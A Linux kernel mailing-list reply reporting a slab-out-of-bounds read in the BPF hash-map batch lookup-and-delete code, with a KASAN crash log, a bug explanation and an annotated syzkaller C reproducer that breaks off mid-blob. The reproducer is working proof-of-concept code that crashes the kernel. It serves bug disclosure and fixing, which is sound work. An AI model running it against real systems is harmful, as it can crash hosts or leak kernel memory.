Re: A slab-out-of-bounds Read bug in __htab_map_lookup_and_delete_batch
From: butt3rflyh4ck
Date: Wed Dec 29 2021 - 22:24:19 EST
Hi, the attachment (inlined below) is a syzkaller-generated reproducer. It crashes the kernel, so run it only inside a disposable VM with KASAN enabled. Enjoy it.
Regards,
butt3rflyh4ck.
On Thu, Dec 30, 2021 at 10:23 AM Alexei Starovoitov
<alexei.starovoitov@xxxxxxxxx> wrote:
>
> On Wed, Dec 29, 2021 at 2:10 AM butt3rflyh4ck
> <butterflyhuangxx@xxxxxxxxx> wrote:
> >
> > Hi, there is a slab-out-of-bounds read bug in
> > __htab_map_lookup_and_delete_batch() in kernel/bpf/hashtab.c.
> > I reproduced it on linux-5.16-rc7 (upstream) and on the latest stable release, linux-5.15.11.
> >
> > # crash log (KASAN report; the reproducer is the syzkaller program inlined at the end of this mail)
> > [ 166.945208][ T6897]
> > ==================================================================
> > [ 166.947075][ T6897] BUG: KASAN: slab-out-of-bounds in _copy_to_user+0x87/0xb0
> > [ 166.948612][ T6897] Read of size 49 at addr ffff88801913f800 by
> > task __htab_map_look/6897
> > [ 166.950406][ T6897]
> > [ 166.950890][ T6897] CPU: 1 PID: 6897 Comm: __htab_map_look Not
> > tainted 5.16.0-rc7+ #30
> > [ 166.952521][ T6897] Hardware name: QEMU Standard PC (i440FX + PIIX,
> > 1996), BIOS 1.13.0-1ubuntu1 04/01/2014
> > [ 166.954562][ T6897] Call Trace:
> > [ 166.955268][ T6897] <TASK>
> > [ 166.955918][ T6897] dump_stack_lvl+0x57/0x7d
> > [ 166.956875][ T6897] print_address_description.constprop.0.cold+0x93/0x347
> > [ 166.958411][ T6897] ? _copy_to_user+0x87/0xb0
> > [ 166.959356][ T6897] ? _copy_to_user+0x87/0xb0
> > [ 166.960272][ T6897] kasan_report.cold+0x83/0xdf
> > [ 166.961196][ T6897] ? _copy_to_user+0x87/0xb0
> > [ 166.962053][ T6897] kasan_check_range+0x13b/0x190
> > [ 166.962978][ T6897] _copy_to_user+0x87/0xb0
> > [ 166.964340][ T6897] __htab_map_lookup_and_delete_batch+0xdc2/0x1590
> > [ 166.965619][ T6897] ? htab_lru_map_update_elem+0xe70/0xe70
> > [ 166.966732][ T6897] bpf_map_do_batch+0x1fa/0x460
> > [ 166.967619][ T6897] __sys_bpf+0x99a/0x3860
> > [ 166.968443][ T6897] ? bpf_link_get_from_fd+0xd0/0xd0
> > [ 166.969393][ T6897] ? rcu_read_lock_sched_held+0x9c/0xd0
> > [ 166.970425][ T6897] ? lock_acquire+0x1ab/0x520
> > [ 166.971284][ T6897] ? find_held_lock+0x2d/0x110
> > [ 166.972208][ T6897] ? rcu_read_lock_sched_held+0x9c/0xd0
> > [ 166.973139][ T6897] ? rcu_read_lock_bh_held+0xb0/0xb0
> > [ 166.974096][ T6897] __x64_sys_bpf+0x70/0xb0
> > [ 166.974903][ T6897] ? syscall_enter_from_user_mode+0x21/0x70
> > [ 166.976077][ T6897] do_syscall_64+0x35/0xb0
> > [ 166.976889][ T6897] entry_SYSCALL_64_after_hwframe+0x44/0xae
> > [ 166.978027][ T6897] RIP: 0033:0x450f0d
> >
> >
> > In the hash table, elements whose keys hash (jhash()) to the same bucket
> > index are chained in the same bucket.
> > By putting many elements into a single bucket, bucket_cnt for that bucket
> > can be driven above the bucket_size the keys/values buffers were sized for,
> > and the copy_to_user() below then reads key_size * bucket_cnt bytes, i.e.
> > past the end of the kernel buffer. In the report above key_size is 7 (see the
> > reproducer), so the 49-byte read is 7 entries' worth of keys.
>
> Can you be more specific?
> If you can send a patch with a fix it would be even better.
>
> > The out-of-bounds read happens in this copy_to_user() pair in __htab_map_lookup_and_delete_batch():
> > ```
> > ...
> > if (bucket_cnt && (copy_to_user(ukeys + total * key_size, keys,
> > key_size * bucket_cnt) ||
> > copy_to_user(uvalues + total * value_size, values,
> > value_size * bucket_cnt))) {
> > ret = -EFAULT;
> > goto after_loop;
> > }
> > ...
> > ```
> >
> > Regards,
> > butt3rflyh4ck.
> >
> >
> > --
> > Active Defense Lab of Venustech
--
Active Defense Lab of Venustech
// autogenerated by syzkaller (https://github.com/google/syzkaller)
#define _GNU_SOURCE
#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <pthread.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/prctl.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
#include <linux/futex.h>
/* Index of this worker process (0..4); assigned in main() right before each fork(). */
static unsigned long long procid;
/* Block the calling thread for about @ms milliseconds (thin usleep() wrapper;
 * the value is converted to microseconds, so very large @ms may truncate). */
static void sleep_ms(uint64_t ms)
{
	const uint64_t micros = ms * 1000;
	usleep(micros);
}
/* Monotonic wall-clock reading in milliseconds (CLOCK_MONOTONIC, so it is
 * unaffected by wall-time adjustments). A failing clock_gettime() terminates
 * the process, as this harness cannot operate without timeouts. */
static uint64_t current_time_ms(void)
{
	struct timespec now;
	int rc = clock_gettime(CLOCK_MONOTONIC, &now);
	if (rc != 0)
		exit(1);
	uint64_t ms = (uint64_t)now.tv_sec * 1000u;
	ms += (uint64_t)now.tv_nsec / 1000000u;
	return ms;
}
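/*
 * Start a worker thread running fn(arg) on a 128 KiB stack.
 *
 * Creation is retried up to 100 times while pthread_create() reports EAGAIN
 * (resource temporarily unavailable), sleeping 50 us between attempts. Any
 * other error, or exhausting the retries, terminates the process with exit(1).
 * The thread handle is discarded: workers run until the process exits and are
 * never joined.
 *
 * NOTE: pthread_create() returns the error number directly and does not set
 * errno, so the retry decision must look at its return value. The original
 * tested errno, which could hold a stale value from an earlier call and make
 * the loop give up (or keep retrying) for the wrong reason.
 */
static void thread_start(void* (*fn)(void*), void* arg)
{
	pthread_t th;
	pthread_attr_t attr;
	pthread_attr_init(&attr);
	pthread_attr_setstacksize(&attr, 128 << 10);
	int rc = EAGAIN;
	for (int i = 0; i < 100 && rc == EAGAIN; i++) {
		rc = pthread_create(&th, &attr, fn, arg);
		if (rc == EAGAIN)
			usleep(50);
	}
	/* Release the attribute object on every path, not only on success. */
	pthread_attr_destroy(&attr);
	if (rc != 0)
		exit(1);
}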
/* Minimal one-shot binary semaphore built on a single futex word. */
typedef struct {
	int state; /* 0 = not signalled, 1 = signalled */
} event_t;

/* Put the event into the not-signalled state (no waiters may exist yet). */
static void event_init(event_t* ev)
{
	ev->state = 0;
}

/* Re-arm a signalled event so it can be waited on again. */
static void event_reset(event_t* ev)
{
	ev->state = 0;
}

/* Signal the event and wake every waiter. Signalling twice without an
 * intervening reset is a logic error in this harness and aborts the process. */
static void event_set(event_t* ev)
{
	if (ev->state != 0)
		exit(1);
	__atomic_store_n(&ev->state, 1, __ATOMIC_RELEASE);
	syscall(SYS_futex, &ev->state, FUTEX_WAKE | FUTEX_PRIVATE_FLAG, 1000000);
}

/* Block until the event is signalled; spurious futex wakeups just re-check. */
static void event_wait(event_t* ev)
{
	for (;;) {
		if (__atomic_load_n(&ev->state, __ATOMIC_ACQUIRE))
			return;
		syscall(SYS_futex, &ev->state, FUTEX_WAIT | FUTEX_PRIVATE_FLAG, 0, 0);
	}
}

/* Non-blocking probe: non-zero when the event is currently signalled. */
static int event_isset(event_t* ev)
{
	return __atomic_load_n(&ev->state, __ATOMIC_ACQUIRE);
}
/* Wait up to @timeout milliseconds for @ev to become signalled.
 * Returns 1 if it was signalled, 0 if the deadline passed first.
 * The futex timeout is relative and is recomputed from the monotonic clock
 * after every wakeup, so spurious wakeups do not stretch the overall wait. */
static int event_timedwait(event_t* ev, uint64_t timeout)
{
	const uint64_t start = current_time_ms();
	uint64_t elapsed = 0;
	for (;;) {
		const uint64_t remain = timeout - elapsed;
		struct timespec ts;
		ts.tv_sec = remain / 1000;
		ts.tv_nsec = (remain % 1000) * 1000 * 1000;
		syscall(SYS_futex, &ev->state, FUTEX_WAIT | FUTEX_PRIVATE_FLAG, 0, &ts);
		if (__atomic_load_n(&ev->state, __ATOMIC_ACQUIRE))
			return 1;
		elapsed = current_time_ms() - start;
		if (elapsed > timeout)
			return 0;
	}
}
/* Format @what with the trailing arguments and write the resulting string to
 * the existing file @file (opened O_WRONLY|O_CLOEXEC; nothing is created or
 * truncated). The formatted text is capped at 1023 bytes. Returns true only if
 * every byte was written; on failure errno describes the open() or write()
 * error (close() cannot clobber it). */
static bool write_file(const char* file, const char* what, ...)
{
	char text[1024];
	va_list ap;
	va_start(ap, what);
	vsnprintf(text, sizeof(text), what, ap);
	va_end(ap);
	text[sizeof(text) - 1] = '\0';
	const int len = strlen(text);

	const int fd = open(file, O_WRONLY | O_CLOEXEC);
	if (fd < 0)
		return false;
	const ssize_t written = write(fd, text, len);
	const int saved_errno = errno;
	close(fd);
	if (written != len) {
		errno = saved_errno;
		return false;
	}
	return true;
}
/*
 * SIGKILL the test child @pid together with its process group (setup_test()
 * made the child a group leader) and reap it into @status.
 *
 * After the kill the child is polled with WNOHANG for ~100 ms. If it still has
 * not been reaped, every FUSE connection under /sys/fs/fuse/connections is
 * aborted -- presumably because a task blocked inside a FUSE request cannot
 * die until the connection is torn down, and the final blocking waitpid()
 * below would otherwise hang forever. The byte written to the abort file is
 * arbitrary (the first character of the path buffer is reused); any write
 * triggers the abort.
 *
 * Note that waitpid(-1, ...) reaps whichever child exits first; an unrelated
 * child's status would be dropped here. That is benign in this program, since
 * loop() only ever has one live child per worker process.
 */
static void kill_and_wait(int pid, int* status)
{
/* Whole group first, then the leader itself in case it left the group. */
kill(-pid, SIGKILL);
kill(pid, SIGKILL);
for (int i = 0; i < 100; i++) {
if (waitpid(-1, status, WNOHANG | __WALL) == pid)
return;
usleep(1000);
}
/* Still not reaped: break any FUSE request the child may be stuck in. */
DIR* dir = opendir("/sys/fs/fuse/connections");
if (dir) {
for (;;) {
struct dirent* ent = readdir(dir);
if (!ent)
break;
if (strcmp(ent->d_name, ".") == 0 || strcmp(ent->d_name, "..") == 0)
continue;
char abort[300];
snprintf(abort, sizeof(abort), "/sys/fs/fuse/connections/%s/abort", ent->d_name);
int fd = open(abort, O_WRONLY);
if (fd == -1) {
continue;
}
/* Best effort: a failed write just means this connection is already gone. */
if (write(fd, abort, 1) < 0) {
}
close(fd);
}
closedir(dir);
} else {
}
/* Block until the child is finally reaped. */
while (waitpid(-1, status, __WALL) != pid) {
}
}
/*
 * Per-child setup run right after fork() in loop(): die with SIGKILL if the
 * parent goes away, become a process-group leader so kill_and_wait() can
 * SIGKILL the whole group, and make this process the OOM killer's preferred
 * victim (oom_score_adj = 1000) so a memory blow-up takes out the test child
 * rather than the harness. The write_file() result is deliberately ignored:
 * a missing /proc is not fatal for the reproducer.
 */
static void setup_test()
{
prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0);
setpgrp();
write_file("/proc/self/oom_score_adj", "1000");
}
/* One worker-thread slot. `created` is set once the pthread exists, `call` is
 * the execute_call() case index to run, `ready` is signalled by the dispatcher
 * to start a call and `done` by the worker when that call has returned. */
struct thread_t {
int created, call;
event_t ready, done;
};
/* Worker pool; threads are created lazily by execute_one() as needed. */
static struct thread_t threads[16];
static void execute_call(int call);
/* Number of calls currently executing across all workers (atomic updates). */
static int running;
/*
 * Worker thread body: loop forever, running whichever execute_call() case the
 * dispatcher hands over via th->call, and reporting completion through
 * th->done. `running` is decremented before `done` is signalled so that
 * execute_one()'s final drain loop observes the update.
 */
static void* thr(void* arg)
{
struct thread_t* th = (struct thread_t*)arg;
for (;;) {
event_wait(&th->ready);
event_reset(&th->ready);
execute_call(th->call);
__atomic_fetch_sub(&running, 1, __ATOMIC_RELAXED);
event_set(&th->done);
}
return 0;
}
/*
 * Run the five execute_call() cases in order, each on an idle worker thread.
 *
 * For every call the dispatcher takes the first worker whose `done` event is
 * set (creating the thread on first use), hands it the call index and waits at
 * most 50 ms for it to finish. A call that takes longer keeps running on its
 * thread while the next call is dispatched to another worker, so consecutive
 * bpf() calls can execute concurrently against the same map -- in particular
 * the unbounded batch update (case 3, count = 0xffffffff) is likely still in
 * flight when the batch lookup-and-delete (case 4) is issued. After the last
 * dispatch the function waits up to ~100 ms for `running` to reach zero.
 */
static void execute_one(void)
{
int i, call, thread;
for (call = 0; call < 5; call++) {
for (thread = 0; thread < (int)(sizeof(threads) / sizeof(threads[0])); thread++) {
struct thread_t* th = &threads[thread];
if (!th->created) {
th->created = 1;
event_init(&th->ready);
event_init(&th->done);
/* A fresh worker starts out idle, i.e. "done". */
event_set(&th->done);
thread_start(thr, th);
}
/* Skip workers that are still busy with an earlier call. */
if (!event_isset(&th->done))
continue;
event_reset(&th->done);
th->call = call;
__atomic_fetch_add(&running, 1, __ATOMIC_RELAXED);
event_set(&th->ready);
/* Bounded wait: a slow call is simply left running. */
event_timedwait(&th->done, 50);
break;
}
}
for (i = 0; i < 100 && __atomic_load_n(&running, __ATOMIC_RELAXED); i++)
sleep_ms(1);
}
/* Redundant re-declaration left behind by the syzkaller generator; harmless. */
static void execute_one(void);
/* Reap children regardless of whether they were created by fork() or clone(). */
#define WAIT_FLAGS __WALL
/*
 * Fork-and-run loop for one worker process: fork a fresh child per iteration,
 * let it run execute_one() once and reap it. A child that has not exited
 * within 5 s is killed via kill_and_wait(). Starting from a fresh child each
 * time means every iteration gets a new map fd and new worker threads; the
 * reproducer relies on repetition (and on five such processes) to raise the
 * odds of hitting the bug.
 */
static void loop(void)
{
int iter = 0;
for (;; iter++) {
int pid = fork();
if (pid < 0)
exit(1);
if (pid == 0) {
setup_test();
execute_one();
exit(0);
}
int status = 0;
uint64_t start = current_time_ms();
for (;;) {
if (waitpid(-1, &status, WNOHANG | WAIT_FLAGS) == pid)
break;
sleep_ms(1);
if (current_time_ms() - start < 5000)
continue;
/* 5 s budget exhausted: force the child down. */
kill_and_wait(pid, &status);
break;
}
}
}
#ifndef __NR_bpf
/* x86-64 syscall number; other architectures must get it from <sys/syscall.h>. */
#define __NR_bpf 321
#endif
/* r[0] receives the map fd returned by BPF_MAP_CREATE in execute_call() case 0
 * (-1 until then); the batch operations in cases 3 and 4 pass it as map_fd. */
uint64_t r[1] = {0xffffffffffffffff};
/*
 * The actual syscall sequence, decoded from the syzkaller program. All
 * argument structs live in the fixed anonymous mapping at 0x20000000 that
 * main() sets up, so the hard-coded pointers are valid in every child.
 *
 *   case 0: bpf(BPF_MAP_CREATE) of a BPF_MAP_TYPE_LRU_PERCPU_HASH (type 0xa)
 *           with key_size 7, value_size 0x309, max_entries 0xf3; fd -> r[0].
 *   case 1: bpf(BPF_MAP_LOOKUP_ELEM) with a NULL attr: cannot succeed, noise.
 *   case 2: BPF_MAP_LOOKUP_ELEM with map_fd = -1: cannot succeed either, but
 *           its memcpy() fills 0x20000a00..0x20001a00 with non-zero bytes that
 *           case 3 later consumes as key material (see below) -- keep it.
 *   case 3: BPF_MAP_UPDATE_BATCH on r[0], count 0xffffffff, keys read from
 *           0x200000c0 and values from 0x20000240.
 *   case 4: BPF_MAP_LOOKUP_AND_DELETE_BATCH on r[0], count 0xffff, keys
 *           written to 0x20000340 and values to 0x200005c0 -- this is the
 *           call in the KASAN trace.
 *
 * As far as I recall, htab_map_alloc_check() refuses LRU map creation for
 * callers that are not bpf_capable(), so this needs CAP_BPF (root) -- verify
 * on the target kernel. It is a kernel-crash reproducer: run it only as root
 * inside a disposable VM built with CONFIG_KASAN=y.
 */
void execute_call(int call)
{
intptr_t res = 0;
switch (call) {
case 0:
/* union bpf_attr for BPF_MAP_CREATE, 0x48 bytes. */
*(uint32_t*)0x20000380 = 0xa; /* map_type = BPF_MAP_TYPE_LRU_PERCPU_HASH */
*(uint32_t*)0x20000384 = 7; /* key_size (matches the 49 = 7 * 7 byte OOB read) */
*(uint32_t*)0x20000388 = 0x309; /* value_size; stored per CPU, rounded up to 8 */
*(uint32_t*)0x2000038c = 0xf3; /* max_entries = 243 -> LRU eviction once exceeded */
*(uint32_t*)0x20000390 = 0; /* map_flags */
*(uint32_t*)0x20000394 = 1; /* inner_map_fd; presumably ignored for a hash map */
*(uint32_t*)0x20000398 = 0; /* numa_node */
memset((void*)0x2000039c, 0, 16); /* map_name */
*(uint32_t*)0x200003ac = 0; /* map_ifindex */
*(uint32_t*)0x200003b0 = -1; /* btf_fd; presumably unused since no BTF type ids are given */
*(uint32_t*)0x200003b4 = 0; /* btf_key_type_id */
*(uint32_t*)0x200003b8 = 0; /* btf_value_type_id */
*(uint32_t*)0x200003bc = 0; /* btf_vmlinux_value_type_id */
*(uint64_t*)0x200003c0 = 0; /* map_extra */
res = syscall(__NR_bpf, 0ul, 0x20000380ul, 0x48ul);
if (res != -1)
r[0] = res;
break;
case 1:
/* BPF_MAP_LOOKUP_ELEM with attr = NULL, size 0: fails; generator noise. */
syscall(__NR_bpf, 1ul, 0ul, 0ul);
break;
case 2:
/* union bpf_attr for BPF_MAP_LOOKUP_ELEM, 0x20 bytes: map_fd = -1, so the
 * lookup itself always fails. The important side effect is the 4 KiB of
 * "key" data copied to 0x20000a00: case 3 reads its keys from 0x200000c0
 * with a 7-byte stride, so this blob supplies most of the distinct keys
 * that push the map past max_entries. */
*(uint32_t*)0x20000180 = -1; /* map_fd */
*(uint64_t*)0x20000188 = 0x20000a00; /* key */
memcpy((void*)0x20000a00, "\xc9\xd6\x4f\x6b\x1f\x2e\xb1\x39\xc7\x52\xfa\xf4\x4e\x11\x00\x46\x21\xd4\x84\x03\x1b\x9e\x2c\xa1\x19\x0c\x7a\x37\xbc\xa1\xbc\x08\x8e\x36\x9b\x8b\xa1\xfc\x50\x16\xcf\x0f\x78\xdb\x15\x08\xed\x4e\x69\x10\xd1\x78\x0b\x9c\x5f\xa0\x1d\x69\xe7\x47\xc1\x09\x35\xf3\x3b\xcc\x35\x5f\xeb\x2d\x32\x8c\x7a\xd6\xbe\x61\x9b\xd9\xcd\xe6\x55\x09\xda\x74\xdc\x74\xe9\xde\x1a\x99\x7e\x45\x86\x3d\xd7\xcf\x81\x48\x2c\x8e\x38\x08\xc6\xff\x35\x44\xe9\xfa\xd6\x25\x4b\x1c\x46\x37\x46\x4a\x02\xa8\xfc\x10\x1d\x66\x64\xae\x2b\xca\x0b\x38\x05\x16\x36\x7f\xd3\x3d\xee\xba\x57\x30\x4f\xfa\xaf\x56\x55\x4e\x30\x5b\xe7\xbb\x3d\x40\xa5\x7e\x12\x2e\x8f\xf5\x96\x96\x8c\x2c\x39\x9d\x88\x2c\x6e\x69\x19\xcb\xd8\x3d\x13\xfe\x86\xf8\x56\x6e\xce\x5e\x76\x63\x64\x62\xac\x16\xa6\xd7\x60\x65\x62\x0d\x47\x65\x86\x39\x6c\x62\xaf\x97\x0b\xf6\x09\x5b\x07\x4f\x66\xf2\x6f\x33\xb1\x2e\x85\x2d\x4d\xa4\x7f\x6c\x8c\x9c\x81\x0c\xbe\x18\x8c\x2a\xdc\x87\x25\x6c\x8f\x18\xff\x81\x2d\x95\xdd\x87\x45\xfa\x96\xd2\x5c\x59\x93\xda\x80\x76\x4e\x99\xdf\xea\x3d\xc2\x42\x9b\x44\x29\xdf\xaf\x84\x6f\xe8\x39\x56\x6c\x99\x53\x68\xaf\x19\x83\xde\x72\x90\xb4\xd6\x96\x6c\xcc\xfc\x39\x53\x69\x58\xae\x31\x89\x45\xf4\x71\x13\xb4\x8e\x8d\xef\xea\x6c\x77\x28\xf9\x81\x71\x8c\x41\x14\xff\x30\x1f\x27\x41\xc9\xf2\xac\x61\x83\x31\xc9\x9a\xf3\xa1\xd6\x54\x9c\x84\xcd\xf0\x6b\x1d\xc9\x19\xd3\x28\x69\x76\xc2\x66\x68\x18\xa4\xad\x10\xbe\x22\x4f\x6b\xc9\xa1\x3a\x2b\xe9\xa1\xee\x20\x52\x79\x4a\xc7\x90\x6a\xb7\xda\x64\x2f\x4b\xc0\x4f\x99\x6c\xf9\x80\x14\x0b\x3c\x0f\xd0\x08\xcd\x35\x16\xf4\x5d\xa8\x9c\x4b\xbe\xb5\xd9\xaa\x90\x2b\x71\xe2\x14\xd0\xb0\x42\x71\x50\x09\x60\x9d\xa9\x38\x2d\xd7\xa5\x44\xe3\xcf\x51\x81\xae\xd2\x02\x54\x04\xcc\xed\x28\xb0\x44\x76\xc3\x7f\xe2\xe6\x5d\xd1\x49\x2d\x64\x44\xf9\xd4\x94\xdf\x08\x20\x72\x0d\xb2\x41\x1e\xe2\x6a\x02\xcf\x35\xbf\x7f\x81\xe3\xc3\xf4\x67\xf3\x0c\x10\x14\x75\x99\x0a\xc2\xba\xda\x18\x80\x77\xfc\xa7\x9e\x24\xba\x10\x15\x77\x5c\xe3\xcc\x48\xe0\xed\x27\xdc\x32\xab\x62\x45\x0f\xc6\x7e\xeb\x0b\xac\
xe8\x48\x87\x33\x13\x3c\x1f\x01\x1a\xf5\x1f\xc8\x11\x00\x7b\xaa\x73\x8a\x92\x9b\x4e\xdd\x54\x94\x59\x88\x69\x5f\xaa\x4d\x8d\x1b\x8b\xe3\x85\x69\xcd\x2a\x3a\x73\x76\xd9\x15\x58\x04\x56\xa5\x6b\x84\x13\x68\x5f\xbb\x64\x0e\x21\xd5\x0c\xbf\x91\x83\x75\x82\x2a\x82\xc5\x63\xa3\xc6\xaa\xf8\xe8\xdd\x61\xe1\x1e\x7c\x5d\xea\xce\xa2\x73\x9c\x5a\x6f\xca\x06\xf3\xa0\xdf\xe5\x90\x6c\xfb\xb9\xad\x5e\x1e\xc9\xdd\xcc\xcb\xe7\xd8\xf6\xc2\x8f\x27\xbc\x46\x4f\x2a\x8a\x88\x2f\x3e\x67\x0f\xcd\x3e\x70\x5b\x17\xbe\xc3\x96\x89\x3d\xe9\xe8\x0f\xf5\xd6\x7d\x66\x66\xbc\x0c\xd0\xe6\xdf\x67\x08\x62\x0c\xa1\xfa\x2f\x1c\xa0\xad\x38\x5f\xe6\xd7\xdd\xad\xf2\x0a\x65\x95\xeb\xb4\xcf\x86\x51\xb6\x2c\x8a\x12\x00\x7d\xb8\xf7\x03\x7b\x86\xfd\x9c\x69\xdf\x97\x19\x04\xd7\xd0\x5d\xa5\x0f\xe2\x49\xac\xd0\x3a\x5a\xd5\xc8\x9c\x8c\xb9\x5f\xa1\x99\x7c\x64\xa3\x57\x87\x04\x33\xc6\x41\x00\x23\x18\x10\xe7\x71\x43\xf7\x2a\x18\xb9\x90\x4e\xec\x7b\xf6\xc5\xcb\xe5\x6c\xf1\x78\x11\x73\x75\xc2\xa0\x63\x16\xfa\xbf\xf0\x4e\x00\x4b\x3a\x96\x58\x7c\xea\x60\x10\x27\xb3\x38\x1a\x79\x3c\xd5\xe2\x19\x73\x51\xe0\x58\x3e\x56\x74\x82\xa2\x38\x14\x81\x24\xbb\x3f\xab\x89\x1b\xe6\xce\x5c\xdc\x0f\x87\x74\x01\xe2\x59\xf0\x11\xb1\x42\xb6\x41\x70\x2e\x41\xbf\x10\xaf\x9b\x63\xf1\x6a\xbf\xd5\x30\xd9\xd1\x7f\x6c\xe3\x71\x60\x54\xbc\x98\xdb\xb7\xc5\x97\xe5\xe9\xb2\xb3\xa0\x41\x98\x5b\x12\x8f\x34\x9a\xb7\xad\xa2\xea\xc8\x32\x39\x11\xe7\x5f\x8f\x77\xfc\x04\xa3\xe4\x64\x74\xd0\xf5\xee\x4a\x4b\x7d\x42\x3a\xbf\xd0\xce\x2e\x3d\x55\xf1\x88\xfe\x79\x61\x3b\xb4\x20\x2f\x62\x5b\xe3\x8f\x6b\x5f\xd3\x08\xfc\x19\xe3\x15\xfe\x7c\x9a\x3b\xaa\xaf\x80\x17\x72\xc7\x13\x82\xde\x59\x23\xaa\x65\x0a\x55\x50\x29\x83\xf8\xe0\x60\xd8\x95\xa3\x20\xa1\x2b\x4e\x43\xe2\x76\x2a\x0c\x47\x5b\x0f\x77\x8c\xfd\x06\x6c\x3f\x50\x53\x53\x41\x22\x49\x53\x2b\xd4\xa5\x21\x6e\xc5\xe1\xee\x15\x40\x16\xef\x55\x3b\x54\x43\x99\xff\xe0\x3a\xcb\xeb\x9a\xf1\x8d\xd4\x20\x8f\x2d\xf7\x70\x39\x06\xc9\xc7\x25\xf3\xf1\xf3\xfe\xb4\xdb\x4d\x3d\x32\xe8\x19\xb4\xa7\x5a\xec\x88\xc1\x55\xdb\x0c\xa1\x55\
xa0\x55\xf6\x56\x4e\x05\x48\xc1\xb5\xe6\x13\xa9\xc3\xb3\xa4\xf7\x1e\x26\xa5\x8f\x1e\x65\xa9\xfd\x98\x32\x12\x7b\xb8\x05\x08\xa1\xec\x1a\x59\xdc\xf3\x33\xc6\xb5\x0f\x9f\xa1\xe7\xe6\x32\xe9\x16\x04\xc4\x60\x1d\x96\xce\x28\xec\x3f\x46\x12\x57\xa9\xc0\x61\xda\xd3\xd5\xa6\xa9\xaa\x4d\x80\x43\xb6\x59\x1b\x72\x55\x3d\x09\xeb\x36\xd2\xd7\x77\xf5\x39\x7d\xf8\xe9\xbc\x37\x89\xe0\xbc\xa5\xed\x73\x18\x94\x14\xf9\xb0\x08\x17\x47\x1e\x3b\x1c\xe3\x3e\xe0\xb5\x27\xe8\x34\x53\x07\x07\x27\xa0\x77\x77\xaf\x17\x6f\xf7\x10\x1e\xd3\x43\xdf\xa4\x05\xac\x99\x6a\x1d\x5b\x4a\xc9\x38\x77\xf1\xcc\xa3\x9b\xaf\x2a\xfa\x44\xbb\x60\x39\x35\xd7\xe4\xe7\x71\x5c\xd5\x47\x23\x1f\x52\xa6\xfa\x3b\x32\xf6\x99\x9d\x4a\xd8\xe5\x81\x20\xcd\xa3\x4d\xe8\xb7\x32\x48\x00\x56\xca\x2f\x7b\x08\x40\x7b\x11\xf5\x54\x37\x83\x56\x10\x9c\xb4\x56\xc8\x24\xeb\x1c\xd0\x49\x0b\x1c\x3a\x2c\x38\xe4\xd9\x7b\xe7\x1a\xf5\x4b\xf9\x4e\x10\x2d\x7d\x50\xe4\x2e\xc6\x97\x6b\x01\x5d\x96\x69\x77\xb5\xd3\xaa\xe6\x63\x51\x86\xf5\xea\x03\x40\x20\xe5\x31\xd0\x87\x00\x93\xed\x2d\xd0\x7b\xfa\x75\x92\xcf\xf0\x92\x55\x4c\xf6\xee\x56\x40\x90\xdb\x28\xa7\x57\x82\x81\x69\x4f\x82\x00\xb8\xb8\x62\x99\xa7\x5f\x1c\x83\x8e\x37\x2b\x7d\x60\x7b\x0b\xb9\xdf\xe2\xde\xe3\xb6\x12\xdb\xd0\x3e\x79\xd3\xb9\x7e\x8c\xb0\x2b\x59\x67\x26\xa5\x1a\xad\x74\xe9\x39\x1c\xd5\x47\x8e\xda\xc5\x53\x05\xf8\xd7\x60\x43\x25\xb6\x27\xa5\xb9\x41\x97\x21\xbb\xc0\xf6\x05\x56\xbc\x32\x6d\x14\x2e\x57\xeb\x82\x0d\x6d\xcf\x71\x24\xdd\x08\x10\x6f\x6f\xa3\x59\xf8\x7b\xd0\x8d\x8c\xe6\xf4\x51\xee\x5e\x8b\xc9\xc1\x74\x31\x65\x63\x9c\xf5\xd3\x71\x50\x3a\xd5\x63\x03\xb0\xff\xec\xb0\xf9\xc8\xe8\x21\xcf\x16\xfa\x20\x14\x33\xed\x59\x7b\xcd\xf6\xae\xba\xa3\x36\xc6\xfc\x7c\x6c\x2f\x97\xdd\xb5\x1b\xb4\xf5\xcd\xb3\x9c\xad\x09\x42\xbe\xfa\xd7\xc0\x93\x3f\x55\x4e\xc2\x2a\x34\x54\xf7\x7a\xd0\x4a\x53\x07\xb5\x34\x47\x46\xa9\x45\x04\xfa\xaf\x93\xf0\xd8\x35\x6a\x5c\x40\xd2\x79\xbd\x16\xe0\x6a\xe3\x94\x1e\x15\x73\x1a\x49\xaa\x47\xd0\x5b\x5b\x9b\x40\xbc\x0a\x52\x7a\xc9\x54\xf5\x67\xf4\x42\x7c\xcd\x7e\x69\
x70\x46\xec\x19\xcf\x5d\x7c\xfa\x93\x2d\xcd\x91\xc9\x5c\xdc\x46\x14\x86\x39\x01\x46\x09\x65\x2b\x21\x34\x18\x7c\x14\x5e\x71\xa0\x9e\x16\x4c\xa1\xcc\xd9\xf4\xf5\xc3\x7f\xe1\x2e\x7b\xe9\x79\xcb\xd5\x94\x23\x28\x21\x27\x7e\x43\x88\xbc\xa0\x33\x72\xe4\x72\x7f\xc0\xfa\x7b\xeb\xf3\xab\xcd\x79\xd4\x44\xe7\xfb\x60\x6c\x70\x43\xf3\x84\x56\x78\x50\x4d\x58\x1a\xa4\xcf\x88\xc2\x26\x6c\x04\xee\xfc\x36\x34\xb1\xdb\xc6\x4e\xb2\x6c\xe5\x7a\x57\x7c\x9c\x10\x90\x9d\x6a\x7d\x76\xdd\x18\x00\x80\xe6\x11\x0b\x4c\x7d\x91\x12\x2b\xd3\x79\x6f\xbd\x10\x1b\x8c\x27\x75\xac\xfb\xe4\x95\x29\x6a\x7f\x1a\xbb\x07\xfe\xfe\x2c\xb0\xa8\xa7\x1b\x7b\x67\x60\x55\xf0\x08\x1e\x62\xc2\xa3\x4a\xc2\x57\x95\x70\x5b\xa3\xbc\xf7\x76\xbf\xa4\x6e\x95\x76\xa4\xb2\x96\x40\x4b\xeb\xc3\x8e\x6d\x99\xd4\xf3\x62\x69\x14\xd6\x9e\xd7\xeb\x7e\xae\x6f\x42\x9a\x7c\x5a\x53\x0e\xd0\x71\x9b\x56\x9d\x6d\xfe\x47\x17\x92\xd8\x2f\xf8\x32\x87\x5b\xbc\x3b\x6e\xe6\x21\xbc\xb3\x11\x1e\x8b\x00\xf6\x09\xae\x3b\xe4\xd7\x25\x57\x80\xfe\xc6\x2e\x5d\x56\x8d\x64\xe6\xed\x45\xf7\xfa\x55\xa